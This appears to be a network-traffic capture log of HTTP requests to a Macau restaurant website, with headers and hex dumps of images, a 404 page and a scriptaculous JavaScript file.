00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*i(12i ''Adobe Photoshop CS6 (Windows)2020:05:26 16:36:050221inv(~JHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:21.633861065 CET2503OUTGET /images/menu05b.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:21.853955984 CET2524INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 20342
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "5efe63f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:27 GMT
                                                                                                                                                              Data Raw: ff d8 ff e1 12 d0 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0c 01 00 00 03 00 00 00 01 00 69 00 00 01 01 00 03 00 00 00 01 00 1c 00 00 01 02 00 03 00 00 00 03 00 00 00 9e 01 06 00 03 00 00 00 01 00 02 00 00 01 12 00 03 00 00 00 01 00 01 00 00 01 15 00 03 00 00 00 01 00 03 00 00 01 1a 00 05 00 00 00 01 00 00 00 a4 01 1b 00 05 00 00 00 01 00 00 00 ac 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1e 00 00 00 b4 01 32 00 02 00 00 00 14 00 00 00 d2 87 69 00 04 00 00 00 01 00 00 00 e8 00 00 01 20 00 08 00 08 00 08 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 43 53 36 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 30 3a 30 35 3a 32 36 20 31 36 3a 33 36 3a 30 35 00 00 00 00 04 90 00 00 07 00 00 00 04 30 32 32 31 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 00 69 a0 03 00 04 00 00 00 01 00 00 00 1c 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 6e 01 1b 00 05 00 00 00 01 00 00 01 76 01 28 00 03 00 00 00 01 00 02 00 00 02 01 00 04 00 00 00 01 00 00 01 7e 02 02 00 04 00 00 00 01 00 00 11 4a 00 00 00 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 ff d8 ff e2 0c 58 49 43 43 5f 50 52 4f 46 49 4c 45 00 01 01 00 00 0c 48 4c 69 6e 6f 02 10 00 00 6d 6e 74 72 52 47 42 20 58 59 5a 20 07 ce 00 02 00 09 00 06 00 31 00 00 61 63 73 70 4d 53 46 54 00 00 00 00 49 45 43 20 73 52 47 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 d6 00 01 00 00 00 00 d3 2d 48 50 20 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 63 70 72 74 00 00 01 50 00 00 00 33 64 65 73 63 00 00 01 84 00 00 00 6c 77 74 70 74 00 00 01 f0 00 00 00 14 62 6b 70 74 00 00 02 04 00 00 00 14 72 58 59 5a 00 00 02 18 00 00 00 14 67 58 59 5a 00 00 02 2c 00 00 00 14 62 58 59 5a 00 00 02 40 00 00 00 14 64 6d 6e 64 00 00 02 54 00 00 00 70 64 6d 64 64 00 00 02 c4 00 00 00 88 76 75 65 64 00 00 03 4c 00 00 00 86 76 69 65 77 00 00 03 d4 00 00 00 24 6c 75 6d 69 00 00 03 f8 00 00 00 14 6d 65 61 73 00 00 04 0c 00 00 00 24 74 65 63 68 00 00 04 30 00 00 00 0c 72 54 52 43 00 00 04 3c 00 00 08 0c 67 54 52 43 00 00 04 3c 00 00 08 0c 62 54 52 43 00 00 04 3c 00 00 08 0c 74 65 78 74 00 00 00 00 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 38 20 48 65 77 6c 65 74 74 2d 50 61 63 6b 61 72 64 20 43 6f 6d 70 61 6e 79 00 00 64 65 73 63 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 12 73 52 47 42 20 49 45 43 36 31 39 36 36 2d 32 2e 31 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 f3 51 00 01 00 00 00 01 16 cc 58 59 5a 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 59 5a 20 00 00 00 00 00 00 6f a2 00 00 38 f5 00 00 03 90 58 59 5a 20 00 00 00 00 00 00 62 99 00 00 b7 85 00 00 18 da 58 59 5a 20 00 00 00 00 00 00 24 a0 00 00 0f 84 00 00 b6 cf 64 65 73 63 00 00 00 00 00 00 00 16 49 45 43 20 68 74 74 70 3a 2f
                                                                                                                                                              Data Ascii: ExifMM*i(12i ''Adobe Photoshop CS6 (Windows)2020:05:26 16:36:050221inv(~JHHXICC_PROFILEHLinomntrRGB XYZ 1acspMSFTIEC sRGB-HP cprtP3desclwtptbkptrXYZgXYZ,bXYZ@dmndTpdmddvuedLview$lumimeas$tech0rTRC<gTRC<bTRC<textCopyright (c) 1998 Hewlett-Packard CompanydescsRGB IEC61966-2.1sRGB IEC61966-2.1XYZ QXYZ XYZ o8XYZ bXYZ $descIEC http:/
                                                                                                                                                              Mar 13, 2023 05:26:28.937668085 CET2724OUTGET /m/static/font-icon/font-awesome.min.css HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: text/css,*/*;q=0.1
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/Index.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710370
                                                                                                                                                              Mar 13, 2023 05:26:29.141199112 CET2734INHTTP/1.1 404 Not Found
                                                                                                                                                              Content-Length: 1635
                                                                                                                                                              Content-Type: text/html
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:34 GMT
                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 57 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0d 0a 3c 53 54 59 4c 45 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 42 4f 44 59 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 31 20 7b 20 66 6f 6e 74 3a 20 31 33 70 74 2f 31 35 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 48 32 20 7b 20 66 6f 6e 74 3a 20 38 70 74 2f 31 32 70 74 20 76 65 72 64 61 6e 61 20 7d 0d 0a 20 20 41 3a 6c 69 6e 6b 20 7b 20 63 6f 6c 6f 72 3a 20 72 65 64 20 7d 0d 0a 20 20 41 3a 76 69 73 69 74 65 64 20 7b 20 63 6f 6c 6f 72 3a 20 6d 61 72 6f 6f 6e 20 7d 0d 0a 3c 2f 53 54 59 4c 45 3e 0d 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 3c 54 41 42 4c 45 20 77 69 64 74 68 3d 35 30 30 20 62 6f 72 64 65 72 3d 30 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 31 30 3e 3c 54 52 3e 3c 54 44 3e 0d 0a 0d 0a 3c 68 31 3e 54 68 65 20 70 61 67 65 20 63 61 6e 6e 6f 74 20 62 65 20 66 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 54 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 6d 69 67 68 74 20 68 61 76 65 20 62 65 65 6e 20 72 65 6d 6f 76 65 64 2c 20 68 61 64 20 69 74 73 20 6e 61 6d 65 20 63 68 61 6e 67 65 64 2c 20 6f 72 20 69 73 20 74 65 6d 70 6f 72 61 72 69 6c 79 20 75 6e 61 76 61 69 6c 61 62 6c 65 2e 0d 0a 3c 68 72 3e 0d 0a 3c 70 3e 50 6c 65 61 73 65 20 74 72 79 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 3a 3c 2f 70 3e 0d 0a 3c 75 6c 3e 0d 0a 3c 6c 69 3e 4d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 64 72 65 73 73 20 64 69 73 70 6c 61 79 65 64 20 69 6e 20 74 68 65 20 61 64 64 72 65 73 73 20 62 61 72 20 6f 66 20 79 6f 75 72 20 62 72 6f 77 73 65 72 20 69 73 20 73 70 65 6c 6c 65 64 20 61 6e 64 20 66 6f 72 6d 61 74 74 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 49 66 20 79 6f 75 20 72 65 61 63 68 65 64 20 74 68 69 73 20 70 61 67 65 20 62 79 20 63 6c 69 63 6b 69 6e 67 20 61 20 6c 69 6e 6b 2c 20 63 6f 6e 74 61 63 74 0d 0a 20 74 68 65 20 57 65 62 20 73 69 74 65 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 74 6f 20 61 6c 65 72 74 20 74 68 65 6d 20 74 68 61 74 20 74 68 65 20 6c 69 6e 6b 20 69 73 20 69 6e 63 6f 72 72 65 63 74 6c 79 20 66 6f 72 6d 61 74 74 65 64 2e 0d 0a 3c 2f 6c 69 3e 0d 0a 3c 6c 69 3e 43 6c 69 63 6b 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 6a 61 76 61 73 63 72 69 70 74 3a 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 31 29 22 3e 42 61 63 6b 3c 2f 61 3e 20 62 75 74 74 6f 6e 20 74 6f 20 74 72 79 20 61 6e 6f 74 68 65 72 20 6c 69 6e 6b 2e 3c 2f 6c 69 3e 0d 0a 3c 2f 75 6c 3e 0d 0a 3c 68 32 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 20 2d 20 46 69 6c 65 20 6f 72 20 64 69 72 65 63 74 6f 72 79 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 62 72 3e 49 6e 74 65 72 6e 65 74 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 20 53 65 72 76 69 63 65
                                                                                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>The page cannot be found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"><STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon }</STYLE></HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD><h1>The page cannot be found</h1>The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.<hr><p>Please try the following:</p><ul><li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li><li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted.</li><li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li></ul><h2>HTTP Error 404 - File or directory not found.<br>Internet Information Service
                                                                                                                                                              Mar 13, 2023 05:26:40.473463058 CET2788OUTGET /js/scriptaculous.js?load=effects HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:40.782104969 CET2791INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 2152
                                                                                                                                                              Content-Type: application/x-javascript
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:20:12 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "07e5aa3a7b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:46 GMT
                                                                                                                                                              Data Raw: 2f 2f 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 30 35 20 54 68 6f 6d 61 73 20 46 75 63 68 73 20 28 68 74 74 70 3a 2f 2f 73 63 72 69 70 74 2e 61 63 75 6c 6f 2e 75 73 2c 20 68 74 74 70 3a 2f 2f 6d 69 72 2e 61 63 75 6c 6f 2e 75 73 29 0a 2f 2f 20 0a 2f 2f 20 50 65 72 6d 69 73 73 69 6f 6e 20 69 73 20 68 65 72 65 62 79 20 67 72 61 6e 74 65 64 2c 20 66 72 65 65 20 6f 66 20 63 68 61 72 67 65 2c 20 74 6f 20 61 6e 79 20 70 65 72 73 6f 6e 20 6f 62 74 61 69 6e 69 6e 67 0a 2f 2f 20 61 20 63 6f 70 79 20 6f 66 20 74 68 69 73 20 73 6f 66 74 77 61 72 65 20 61 6e 64 20 61 73 73 6f 63 69 61 74 65 64 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 20 66 69 6c 65 73 20 28 74 68 65 0a 2f 2f 20 22 53 6f 66 74 77 61 72 65 22 29 2c 20 74 6f 20 64 65 61 6c 20 69 6e 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 77 69 74 68 6f 75 74 20 72 65 73 74 72 69 63 74 69 6f 6e 2c 20 69 6e 63 6c 75 64 69 6e 67 0a 2f 2f 20 77 69 74 68 6f 75 74 20 6c 69 6d 69 74 61 74 69 6f 6e 20 74 68 65 20 72 69 67 68 74 73 20 74 6f 20 75 73 65 2c 20 63 6f 70 79 2c 20 6d 6f 64 69 66 79 2c 20 6d 65 72 67 65 2c 20 70 75 62 6c 69 73 68 2c 0a 2f 2f 20 64 69 73 74 72 69 62 75 74 65 2c 20 73 75 62 6c 69 63 65 6e 73 65 2c 20 61 6e 64 2f 6f 72 20 73 65 6c 6c 20 63 6f 70 69 65 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2c 20 61 6e 64 20 74 6f 0a 2f 2f 20 70 65 72 6d 69 74 20 70 65 72 73 6f 6e 73 20 74 6f 20 77 68 6f 6d 20 74 68 65 20 53 6f 66 74 77 61 72 65 20 69 73 20 66 75 72 6e 69 73 68 65 64 20 74 6f 20 64 6f 20 73 6f 2c 20 73 75 62 6a 65 63 74 20 74 6f 0a 2f 2f 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 63 6f 6e 64 69 74 69 6f 6e 73 3a 0a 2f 2f 20 0a 2f 2f 20 54 68 65 20 61 62 6f 76 65 20 63 6f 70 79 72 69 67 68 74 20 6e 6f 74 69 63 65 20 61 6e 64 20 74 68 69 73 20 70 65 72 6d 69 73 73 69 6f 6e 20 6e 6f 74 69 63 65 20 73 68 61 6c 6c 20 62 65 0a 2f 2f 20 69 6e 63 6c 75 64 65 64 20 69 6e 20 61 6c 6c 20 63 6f 70 69 65 73 20 6f 72 20 73 75 62 73 74 61 6e 74 69 61 6c 20 70 6f 72 74 69 6f 6e 73 20 6f 66 20 74 68 65 20 53 6f 66 74 77 61 72 65 2e 0a 2f 2f 0a 2f 2f 20 54 48 45 20 53 4f 46 54 57 41 52 45 20 49 53 20 50 52 4f 56 49 44 45 44 20 22 41 53 20 49 53 22 2c 20 57 49 54 48 4f 55 54 20 57 41 52 52 41 4e 54 59 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 0a 2f 2f 20 45 58 50 52 45 53 53 20 4f 52 20 49 4d 50 4c 49 45 44 2c 20 49 4e 43 4c 55 44 49 4e 47 20 42 55 54 20 4e 4f 54 20 4c 49 4d 49 54 45 44 20 54 4f 20 54 48 45 20 57 41 52 52 41 4e 54 49 45 53 20 4f 46 0a 2f 2f 20 4d 45 52 43 48 41 4e 54 41 42 49 4c 49 54 59 2c 20 46 49 54 4e 45 53 53 20 46 4f 52 20 41 20 50 41 52 54 49 43 55 4c 41 52 20 50 55 52 50 4f 53 45 20 41 4e 44 0a 2f 2f 20 4e 4f 4e 49 4e 46 52 49 4e 47 45 4d 45 4e 54 2e 20 49 4e 20 4e 4f 20 45 56 45 4e 54 20 53 48 41 4c 4c 20 54 48 45 20 41 55 54 48 4f 52 53 20 4f 52 20 43 4f 50 59 52 49 47 48 54 20 48 4f 4c 44 45 52 53 20 42 45 0a 2f 2f 20 4c 49 41 42 4c 45 20 46 4f 52 20 41 4e 59 20 43 4c 41 49 4d 2c 20 44 41 4d 41 47 45 53 20 4f 52 20 4f 54 48 45 52 20 4c 49 41 42 49 4c 49 54 59 2c 20 57 48 45 54 48 45 52 20 49 4e 20 41 4e 20 41 43 54 49 4f 4e
                                                                                                                                                              Data Ascii: // Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)// // Permission is hereby granted, free of charge, to any person obtaining// a copy of this software and associated documentation files (the// "Software"), to deal in the Software without restriction, including// without limitation the rights to use, copy, modify, merge, publish,// distribute, sublicense, and/or sell copies of the Software, and to// permit persons to whom the Software is furnished to do so, subject to// the following conditions:// // The above copyright notice and this permission notice shall be// included in all copies or substantial portions of the Software.//// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,// EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND// NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE// LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
                                                                                                                                                              Mar 13, 2023 05:26:42.265671015 CET2922OUTGET /images/title_aboutus.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                              Referer: http://www.gourmethousemacau.com/AboutUs.asp
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:42.470509052 CET2933INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1686
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:27 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "7a79a3f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:48 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 14 00 44 03 01 11 00 02 11 01 03 11 01 ff c4 00 a4 00 00 02 02 02 03 00 00 00 00 00 00 00 00 00 00 00 00 04 05 06 03 07 02 08 09 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 07 10 00 00 04 04 05 01 06 03 05 09 00 00 00 00 00 00 01 02 03 04 13 05 15 16 00 11 12 14 06 07 21 31 22 32 42 24 41 23 17 51 61 52 b2 34 33 43 83 64 94 75 26 46 37 11 00 00 04 03 05 03 08 08 06 03 00 00 00 00 00 00 01 11 02 12 00 03 13 21 31 22 04 14 41 61 32 51 71 81 c1 42 23 05 06 f0 91 a1 b1 52 62 33 15 d1 f1 72 82 43 24 93 a3 35 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 f3 04 10 9a 93 06 09 3d 6f 2d 55 f3 74 e6 2f 13 51 66 92 f3 2a 40 5d 54 d2 12 82 87 22 62 3a 8c 52 09 cb a8 40 32 0c c3 3e fc 29 53 e5 a5 61 2c 54 0e 10 11 00 30 31 00 bc 40 2f 10 03 03 e4 38 83 03 28 73 0d 89 83 04 10 60 82 0c 10 41 82 08 30 41 06 08 23 a6 dd 57 e5 92 57 5c c3 92 4f 43 92 cb 58 ce 7a 38 49 79 f8 ac 9d cb d4 51 55 eb c1 58 8f 26 84 49 15 0e 53 1b 5b 72 91 0f 09 44 44 d9 87 dd 8f 96 79 93 c4 a4 af 39 36 75 54 25 79 46 53 48 a8 00 56 b3 05 cd 00 01 13 13 40 02 2c 0b cc 37 46 09 eb 01 50 89 da 9b ba e3 63 f2 49 84 ca 73 d4 de 95 4c b8 7a ec 40 67 3c 62 70 e5 ac c6 60 45 16 45 36 ab 99 82 a0 ac 04 8e 91 95 11 01 00 02 c4 27 7e 7a bb 32 1e ee 7e 7c dc c7 89 e4 e6 65 45 38 e4 cc 10 52 80 44 01 23 4c 4d a0 20 2a d9 63 93 79 9d 90 d5 88 8a d2 29 da 03 d5 1c 91 ea af 25 54 11 e2 db 09 65 f8 b7 2c 73 c5 45 f0 15 6a 59 41 b3 60 7c 77 b0 45 40 54 42 01 80 01 28 b9 ea f5 80 62 51 e6 3c ca 8b 2e d4 6a 06 70 c9 3b 69 e1 4d 41 5b 4d dc 3d 87 19 f6 a0 09 ca e1 ed 19 6e e5 38 c7 c9 3a a1 cb 78 83 1e a4 4b a6 8d e5 33 0e 49 c3 64 cd 67 b2 79 9b 66 eb a2 c5 d3 67 4a 99 1d 2b 35 33 95 54 4c e4 39 04 3b 16 10 30 76 f6 77 0d 73 fe 61 cd e4 65 e6 a5 cc 04 2a 6c 99 69 98 95 00 08 21 49 50 b7 12 45 42 a0 10 10 1b 96 27 ba 05 ce 52 01 40 24 60 07 17 b9 ef 2a 9d 35 e7 3c 53 88 4b 41 8a 29 72 59 34 d9 e1 df 39 45 45 8c 8b 96 60 84 01 02 11 64 80 c4 cd 51 13 97 30 13 00 64 06 2f 7e 3b 39 cf 11 9e 8c f4 9c ac b6 80 4c 97 31 46 20 22 4a 43 5b 60 29 26 18 ad 0b c7 60 84 35 4b 10 58 24 36 80 c5 7f a1 0e f9 54 cb 81 30 99 72 39 f2 53 b2 39 5d f9 1a 1c c8 2e 0e c8 28 cc 1d 26 68 ee 56 74 bc 50 f0 80 10 00 84 d0 50 02 e6 6c b3 c6 2f 27 4d cd 4e c8 26 64 f9 80 b3 15 95 82 eb 16 a0 17 29 4b 53 be 5b 12 d0 b2 db e2 99 61 50 a0 c4 4f f3 86 38 b7 fd 9b ab 5f da 78 cf e4 7d 8b f8 77 fd 9c e7 e8 93 ee 5c 4a 3e aa b9 83 ae 28 52 79 fc ef 8c a3 d6 a9 ac 96 5e 2f 56 2f 50 21 39 5c cd d7 78 9b 36 c7 6c cc 1c 3b 3b 56 c2 55 97 2a
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedD!1"2B$A#QaR43Cdu&F7!1"Aa2QqB#Rb3rC$5?=o-Ut/Qf*@]T"b:R@2>)Sa,T01@/8(s`A0A#WW\OCXz8IyQUX&IS[rDDy96uT%yFSHV@,7FPcIsLz@g<bp`EE6'~z2~|eE8RD#LM *cy)%Te,sEjYA`|wE@TB(bQ<.jp;iMA[M=n8:xK3IdgyfgJ+53TL9;0vwsae*li!IPEB'R@$`*5<SKA)rY49EE`dQ0d/~;9L1F "JC[`)&`5KX$6T0r9S9].(&hVtPPl/'MN&d)KS[aPO8_x}w\J>(Ry^/V/P!9\x6l;;VU*
                                                                                                                                                              Mar 13, 2023 05:26:42.480875015 CET2934OUTGET /images/video.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ; Hm_lvt_3eff88a357a8c5aca6bb583a65de2875=1678710370; Hm_lpvt_3eff88a357a8c5aca6bb583a65de2875=1678710390
                                                                                                                                                              Mar 13, 2023 05:26:42.685996056 CET2948INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 6434
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:28 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9e76e1f9a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
